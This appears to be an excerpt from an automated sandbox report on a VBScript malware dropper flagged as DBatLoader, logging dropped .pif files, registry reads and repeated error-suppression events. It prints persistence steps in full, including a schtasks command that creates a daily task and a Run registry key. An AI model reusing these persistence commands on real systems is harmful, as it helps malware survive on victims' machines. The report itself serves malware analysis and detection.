                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: IBKB.vbsStatic file information: File size 1636027 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.000000002214F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.0000000022120000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002B79000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 2.2.x.exe.2db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: aymtmquJ.pif.2.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC894C LoadLibraryW,GetProcAddress,FreeLibrary,2_2_02DC894C
                      Source: alpha.pif.5.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDD2FC push 02DDD367h; ret 2_2_02DDD35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB63B0 push 02DB640Bh; ret 2_2_02DB6403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB63AE push 02DB640Bh; ret 2_2_02DB6403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBC349 push 8B02DBC1h; ret 2_2_02DBC34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDC378 push 02DDC56Eh; ret 2_2_02DDC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB332C push eax; ret 2_2_02DB3368
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDD0AC push 02DDD125h; ret 2_2_02DDD11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC306C push 02DC30B9h; ret 2_2_02DC30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC306B push 02DC30B9h; ret 2_2_02DC30B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDD1F8 push 02DDD288h; ret 2_2_02DDD280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDD144 push 02DDD1ECh; ret 2_2_02DDD1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCF108 push ecx; mov dword ptr [esp], edx2_2_02DCF10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB6782 push 02DB67C6h; ret 2_2_02DB67BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB6784 push 02DB67C6h; ret 2_2_02DB67BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBD5A0 push 02DBD5CCh; ret 2_2_02DBD5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DDC570 push 02DDC56Eh; ret 2_2_02DDC566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBC56C push ecx; mov dword ptr [esp], edx2_2_02DBC571
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC8AD8 push 02DC8B10h; ret 2_2_02DC8B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCAAE0 push 02DCAB18h; ret 2_2_02DCAB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBCBEC push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC886C push 02DC88AEh; ret 2_2_02DC88A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02E24850 push eax; ret 2_2_02E24920
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBC9DF push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC6948 push 02DC69F3h; ret 2_2_02DC69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC6946 push 02DC69F3h; ret 2_2_02DC69EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBC977 push 02DBCD72h; ret 2_2_02DBCD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC790C push 02DC7989h; ret 2_2_02DC7981
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC5E7C push ecx; mov dword ptr [esp], edx2_2_02DC5E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC2F60 push 02DC2FD6h; ret 2_2_02DC2FCE
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 8_1_004CA22B push 0000002Eh; iretd 8_1_004CA258
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 8_1_004CD6D6 pushad ; ret 8_1_004CD694
                      Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0084CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,9_2_0084CBD0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_02DCAB1C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
